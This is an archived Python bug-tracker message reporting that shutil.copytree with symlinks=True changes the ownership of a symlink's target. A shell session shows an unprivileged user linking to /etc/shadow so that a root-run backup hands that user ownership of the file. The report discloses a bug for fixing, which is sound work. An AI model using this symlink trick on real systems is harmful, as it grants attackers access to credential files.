Message 246170 - Python tracker

➜

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author	spaceone
Recipients	dstufft, eric.araujo, spaceone
Date	2015-07-03.12:41:24
SpamBayes Score	-1.0
Marked as misclassified	Yes
Message-id	<1435927285.75.0.961526406644.issue24558@psf.upfronthosting.co.za>
In-reply-to

Content
shutil.copytree(src, dst, symlink=True) destroys file system permissions and open security issues. See the following python/bash session: # ls -l /etc/shadow -rw-r----- 1 root shadow 1114 May 8 19:10 /etc/shadow # su foobar $ ln -s /etc/shadow && exit # python -c '__import__("shutil").copytree('/home/', '/backups/home', symlinks=True) # ls -l /etc/shadow -rw-r----- 1 foobar Domain Users 1114 Mai 8 19:10 /etc/shadow As you can see the file "/etc/shadow" is now owned by the user "foobar" and its primary group.

shutil.copytree(src, dst, symlink=True) destroys file system permissions and open security issues. See the following python/bash session:

# ls -l /etc/shadow
 -rw-r----- 1 root shadow 1114 May  8 19:10 /etc/shadow
# su foobar
$ ln -s /etc/shadow && exit
# python -c '__import__("shutil").copytree('/home/', '/backups/home', symlinks=True)
# ls -l /etc/shadow
-rw-r----- 1 foobar Domain Users 1114 Mai  8 19:10 /etc/shadow

As you can see the file "/etc/shadow" is now owned by the user "foobar" and its primary group.

History
Date	User	Action	Args
2015-07-03 12:41:25	spaceone	set	recipients: + spaceone, eric.araujo, dstufft
2015-07-03 12:41:25	spaceone	set	messageid: <1435927285.75.0.961526406644.issue24558@psf.upfronthosting.co.za>
2015-07-03 12:41:25	spaceone	link	issue24558 messages
2015-07-03 12:41:24	spaceone	create